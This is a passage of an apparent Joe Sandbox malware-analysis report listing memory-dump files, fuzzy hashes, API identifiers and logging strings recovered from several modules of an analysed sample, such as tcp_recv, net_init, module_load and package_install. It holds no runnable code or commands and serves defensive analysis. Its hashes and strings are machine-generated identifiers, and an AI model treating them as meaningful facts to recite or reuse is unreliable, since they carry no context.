    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: ErrorLastrecv
    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
    • API String ID: 2514157807-65069805
    • Opcode ID: eba924376e7af55d3e9d9af242b3953526818afa655de96f566b8cdee47eb7cc
    • Instruction ID: 797b1d1afe88a60e45258c91175b7d870fe4e25384927a3eaed8c6276d85ec49
    • Opcode Fuzzy Hash: eba924376e7af55d3e9d9af242b3953526818afa655de96f566b8cdee47eb7cc
    • Instruction Fuzzy Hash: 11114C51A0CE179DE610572BA8516BC1251AF757B4F5003F1E83EFAAF5DF1CA986C308
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: ErrorLastrecv
    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
    • API String ID: 2514157807-65069805
    • Opcode ID: 884c80d553fb6549a94c8d8e5a5069de13c464ac09d09463092afce2d5c40c4e
    • Instruction ID: bdeb56b428121e822ceb38197d04c9f75ffe7360a04212018cf14f1dc813f1f0
    • Opcode Fuzzy Hash: 884c80d553fb6549a94c8d8e5a5069de13c464ac09d09463092afce2d5c40c4e
    • Instruction Fuzzy Hash: 69119150E0CE1FC2FB249327AC406B41240AF85BB4F5017F1D86D866F5EEDCA906A300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: ErrorLastrecv
    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
    • API String ID: 2514157807-65069805
    • Opcode ID: 36230ea898b115dc2fe11161af9f4bde64d57a46b3472181a5d532514b5feed2
    • Instruction ID: eb7a010bbb520019d240ee4c893c98a6a0ea31901d66a76247ed2fbad77fc4f7
    • Opcode Fuzzy Hash: 36230ea898b115dc2fe11161af9f4bde64d57a46b3472181a5d532514b5feed2
    • Instruction Fuzzy Hash: 06119194E1DD5781FB20639BAC403BB1258AF457B4F8423B0D83D4AAF5DE1CB5568300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: ErrorLastrecv
    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
    • API String ID: 2514157807-65069805
    • Opcode ID: 1531048adbcce7d774912a8d9d5e0e06b2ba9bfda505540116f96d030ed67777
    • Instruction ID: 2abf370108d9cf4a8c8fd01cfad7862729abae0fb2316f1128fc7c0d252b323e
    • Opcode Fuzzy Hash: 1531048adbcce7d774912a8d9d5e0e06b2ba9bfda505540116f96d030ed67777
    • Instruction Fuzzy Hash: EA118CA0E0C50791E6216729A844FB81225AF45BB4F441333D8FF8B6F3EF1CA9868340
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: ErrorLastrecv
    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
    • API String ID: 2514157807-65069805
    • Opcode ID: a204f37957f8cc50f7fb8682c8291a3d1c880997f0210f9337153abe182ed35f
    • Instruction ID: e11a714e117ad408ef72cc2bcdb5b8046319745876086194784b10fba0e2fef1
    • Opcode Fuzzy Hash: a204f37957f8cc50f7fb8682c8291a3d1c880997f0210f9337153abe182ed35f
    • Instruction Fuzzy Hash: 3C119191B0C60761FA30AF54AC503B91240EF447F4F400330E9AD966F5EE1CE506AF00
    APIs
    • LoadLibraryA.KERNEL32(?,?,service,000001FC7A4F13D0,00007FF6EF652910), ref: 00007FF6EF652312
    • GetLastError.KERNEL32(?,?,service,000001FC7A4F13D0,00007FF6EF652910), ref: 00007FF6EF65233E
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: ErrorLastLibraryLoadfflushfwrite
    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load$service
    • API String ID: 4085810780-4145076245
    • Opcode ID: 31b2b52d77e7e7858c6070d5e0cca7dbf1c3275249328b34dc41f372c6276438
    • Instruction ID: 419a45145d3390099223b699135bc68d46e0df5289704c095398054ef14f9b63
    • Opcode Fuzzy Hash: 31b2b52d77e7e7858c6070d5e0cca7dbf1c3275249328b34dc41f372c6276438
    • Instruction Fuzzy Hash: 36F0E252E1A617A3FD10979AF8002B413086F96B84F4A0831EC0DE7762ED1EA586F30A
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: Startupfflushfwrite
    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
    • API String ID: 3771387389-898331216
    • Opcode ID: 625dc732f90a1f00aa4c1569bcfd38f081e90a6b280c64cbe464392608da0e77
    • Instruction ID: 3038bb72f34f2785bf82a2ba686d5c8cdbd665b753aed19dc54e9e1f77dfaf2a
    • Opcode Fuzzy Hash: 625dc732f90a1f00aa4c1569bcfd38f081e90a6b280c64cbe464392608da0e77
    • Instruction Fuzzy Hash: B4F09660B08D07CDFB109712E8003F862516F703A4F8401F2D42E6A6B5EE5DF689C708
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: Startupfflushfwrite
    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
    • API String ID: 3771387389-898331216
    • Opcode ID: acff9132394572571e9ead6a7c290dff13286087cde6f82f4a6ecea9baf83ee6
    • Instruction ID: fee15db58f8e3f8f9d61ee6c6f547e4bef11f350e933af9706e708851df55bac
    • Opcode Fuzzy Hash: acff9132394572571e9ead6a7c290dff13286087cde6f82f4a6ecea9baf83ee6
    • Instruction Fuzzy Hash: 4BF03AE0B0D64B91FB119B24E8543F97351EF56388F440037D8CE4A2B6EEADEA99C310
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: Startupfflushfwrite
    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
    • API String ID: 3771387389-898331216
    • Opcode ID: 5a447744b40fc6ddb4fce790949040fd6161e5f8a88fd7e75ec027fdea9a4653
    • Instruction ID: 78d2d34b49c6b8bf3898838704d1245fccb1c15a9c2af1b4e391a1a18bf912db
    • Opcode Fuzzy Hash: 5a447744b40fc6ddb4fce790949040fd6161e5f8a88fd7e75ec027fdea9a4653
    • Instruction Fuzzy Hash: 00F06760B18C8B82FF11DB23EC017F52260EF957A4F8404B2C49D4A2F6EE9CE648C740
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: Startupfflushfwrite
    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
    • API String ID: 3771387389-898331216
    • Opcode ID: b93122e5c766c1df7d1683d665679da329bd46c519043c3a2403d14143d78ae7
    • Instruction ID: 124b8a4d3654ca8b8b749daf897177b7f688a224eb552b6d448123d2e47cfd9c
    • Opcode Fuzzy Hash: b93122e5c766c1df7d1683d665679da329bd46c519043c3a2403d14143d78ae7
    • Instruction Fuzzy Hash: 14F01DA1B0CD47D1FF109B97EC453F61258AF107A4F8820B6D40E466B5EE5CE9498310
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: Startupfflushfwrite
    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
    • API String ID: 3771387389-898331216
    • Opcode ID: 67fe9a9e212230c1ac7a02241026cc322f159ac854deddccca5ffee0e1b4d977
    • Instruction ID: 254dd359ef6b75d1ebd72df660dac250975fd3ec95465a723699a241e78d5f4c
    • Opcode Fuzzy Hash: 67fe9a9e212230c1ac7a02241026cc322f159ac854deddccca5ffee0e1b4d977
    • Instruction Fuzzy Hash: 09F01760F0C44791FB209B10E889BF46326AF60B84F840037D4DD4A2F6EF5CE5898780
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: Startupfflushfwrite
    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
    • API String ID: 3771387389-898331216
    • Opcode ID: 82a45985ff1d02fc9e78d7f76e6229d12296bcb138f8e3f3c5292260bb9d0297
    • Instruction ID: 182071c45087e78de70cff6335fdedb02e6ea5a137777dcebeb026236f222c30
    • Opcode Fuzzy Hash: 82a45985ff1d02fc9e78d7f76e6229d12296bcb138f8e3f3c5292260bb9d0297
    • Instruction Fuzzy Hash: A8F030A2B0874791FB329F14E8453F51290EF507C4F440836D5CD462B9EE1CE5498F10
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: strlen$HandleModule_mbscpy
    • String ID: [E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x)$[I] (%s) -> Done(pkg_path=%s,tgt_path=%s)$package_install$service
    • API String ID: 3656010895-1379287937
    • Opcode ID: 63154ff3bdd97e0373aded726482827ac143fbb49905b81037dd08d23e9506c3
    • Instruction ID: 71f3ca9b49272de28b885bdd8e30b4e22db2aaadc9f4fd3aee2503a081375ab7
    • Opcode Fuzzy Hash: 63154ff3bdd97e0373aded726482827ac143fbb49905b81037dd08d23e9506c3
    • Instruction Fuzzy Hash: 1131A773A0C68793FB109B54E4903EA2365FB84344F800832E64ED769ADF7ED509E785
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: AddressErrorLastProcfflushfwrite
    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
    • API String ID: 1224403792-3063791425
    • Opcode ID: 43ee0e03b75cf9c72b49b9727778b1161a663c20aa97baaba46f6adb6057179d
    • Instruction ID: 686b8702bd2260e264ce43f13945f55b18f85997c43b6af5057686c0e68ea69f
    • Opcode Fuzzy Hash: 43ee0e03b75cf9c72b49b9727778b1161a663c20aa97baaba46f6adb6057179d
    • Instruction Fuzzy Hash: 72F0D650E08E07CAFE158757F8001B952526F24BE4F4441B1CC6E37BB8EE2CE6828308
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: AddressErrorLastProcfflushfwrite
    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
    • API String ID: 1224403792-3063791425
    • Opcode ID: 2d80f60a7fc54b633a173b78560123f85385361f390db4834d305d2dc16c8abd
    • Instruction ID: 09d3e6d66cf2fd00268283aea7d1cb43eec574ce9852986d70e3ab42740fb7cf
    • Opcode Fuzzy Hash: 2d80f60a7fc54b633a173b78560123f85385361f390db4834d305d2dc16c8abd
    • Instruction Fuzzy Hash: 9FF08191A0D74782FA516B55A8002E9A251AF44BD4F184133DDEC0BBB4EE2DE966C300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: AddressErrorLastProcfflushfwrite
    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
    • API String ID: 1224403792-3063791425
    • Opcode ID: 7a72d4ed66baca842218f1c7e4dc023994f12581eef7fbbacc79224501802e6f
    • Instruction ID: fa1d0a4ed8ebb5cc2290f3382b96855f7473159e03676be719b0c7f69369a821
    • Opcode Fuzzy Hash: 7a72d4ed66baca842218f1c7e4dc023994f12581eef7fbbacc79224501802e6f
    • Instruction Fuzzy Hash: 8FF0F450A09E8B42FE1B8707FC006B612516F54BE4F0844B1CC9C4B7F8EEACE546C300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: AddressErrorLastProcfflushfwrite
    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
    • API String ID: 1224403792-3063791425
    • Opcode ID: 76083edb125581580526d7ef43c5a3483c7446e0e7917b6a9b1b563f89cea384
    • Instruction ID: d5af7b37b381b8709014738417ff9a0be725286547af346e32bfbf8089fcc0da
    • Opcode Fuzzy Hash: 76083edb125581580526d7ef43c5a3483c7446e0e7917b6a9b1b563f89cea384
    • Instruction Fuzzy Hash: A2F08C90A0DF1792FF519B8BAD002AB56196F44FE4F4850B1DC6C0BBB5EE2CF6468300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: AddressErrorLastProcfflushfwrite
    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
    • API String ID: 1224403792-3063791425
    • Opcode ID: 9d1125fae52c8bad3297328e65f99d2f021d6ef7c0b12073a731c8f2c08208cb
    • Instruction ID: 69f8caa4f9e7428c271b3df3c5f35f8ecb7b449f3fa379ca2ea59ace28603d71
    • Opcode Fuzzy Hash: 9d1125fae52c8bad3297328e65f99d2f021d6ef7c0b12073a731c8f2c08208cb
    • Instruction Fuzzy Hash: 1EF081A0A0D74751FA519745A9099A55262AF04FC4F884033DCDD4BBBAEF2CE6468300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: AddressErrorLastProcfflushfwrite
